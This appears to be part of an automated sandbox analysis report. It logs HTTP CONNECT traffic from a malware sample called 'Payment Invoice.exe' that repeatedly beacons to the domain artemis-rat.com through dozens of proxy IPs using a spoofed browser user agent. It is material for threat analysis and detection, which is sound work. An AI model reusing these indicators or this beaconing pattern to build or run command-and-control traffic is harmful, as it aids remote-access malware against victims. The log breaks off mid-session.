                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1674192.168.2.454977157.185.173.217265897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.330646992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1675192.168.2.45494594.177.106.17823247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.330713034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1676192.168.2.45425091.134.140.160164877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.330847025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.886214972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.480305910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777076006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183496952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.564127922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.975097895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.776998997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.386080027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1677192.168.2.454930203.112.134.7456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.330902100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1678192.168.2.45501094.131.14.6610817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.330972910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1679192.168.2.455072104.16.108.204807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.330974102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.486109018 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1680192.168.2.455085185.162.228.128807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.331130981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.486233950 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1681192.168.2.4550163.9.71.16731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.331135988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.623320103 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1682192.168.2.455060162.214.225.223398247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.338872910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826472044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515028954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1683192.168.2.454936175.183.82.22181977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.343288898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1684192.168.2.45494990.188.250.16807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.470762014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1685192.168.2.455070104.129.206.6588007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.477368116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.685745001 CET125INHTTP/1.1 407 Unauthorized
                                                                Server: Zscaler/6.2
                                                                Cache-control: no-cache
                                                                Content-Length: 0
                                                                Proxy-Authenticate: Negotiate


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1686192.168.2.454948175.183.82.221807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.477790117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1687192.168.2.455033103.166.141.74200747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.478267908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1688192.168.2.45507372.10.164.178220177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.479238033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.967886925 CET28INHTTP/1.1 502 Bad Gateway


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1689192.168.2.454305191.101.78.20731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.480957031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.526998043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.527237892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.328188896 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1690192.168.2.455036148.72.215.230443877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.481303930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.276940107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386883974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.474798918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.589521885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.777048111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.888408899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.089299917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:03.589361906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1691192.168.2.454966223.113.80.15890917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.486596107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.942269087 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.1
                                                                Date: Mon, 11 Mar 2024 15:15:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1692192.168.2.45069767.43.228.253260877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.486638069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1693192.168.2.455105107.173.255.18312347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.495873928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1694192.168.2.455048208.109.14.49373777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.513748884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324033976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.511506081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.714545965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1695192.168.2.45503127.76.193.21310807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.517285109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
